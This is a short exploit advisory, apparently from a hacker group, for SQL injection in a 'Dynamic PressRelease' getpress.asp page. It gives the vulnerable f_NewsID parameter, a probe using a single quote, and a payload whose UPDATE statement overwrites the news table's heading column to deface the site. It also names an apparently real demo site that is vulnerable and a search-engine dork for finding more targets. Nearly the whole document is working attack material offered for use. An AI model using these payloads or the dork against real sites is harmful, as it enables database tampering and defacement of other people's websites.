Dynamic PressRelease/getpress.asp sql injection
Credit : CodeXpLoder'tq
mail : codexploder[at]hotmail[dot]com
site : Biyosecurity.net,expw0rm.com
thx : BiyoSecurityTeam all members thx 3APA3A
spec.note : "Live The Life"
1-) example.com/[patch]/getpress.asp?f_Category=News&f_NewsID=(sql methot)
1-) example.com/dynamic/getpress.asp?f_Category=News&f_NewsID=(sql methot)
2-) example.com/[patch]/getpress.asp?f_Category=News&f_NewsID=1'
2-) example.com/[patch]/getpress.asp?f_Category=News&f_NewsID=1,2,3,4,
5+update+tbl+set+column='your text or meta code';–
#tbl : news
#column : heading
###################################################################
sourge site : http://www.safetynews.com/
demo site : http://www.nsca.org.au/dynamic/getpress.asp?f_Category=News&f_NewsID=260
order code for views sites :inurl:"getpress.asp?f_Category"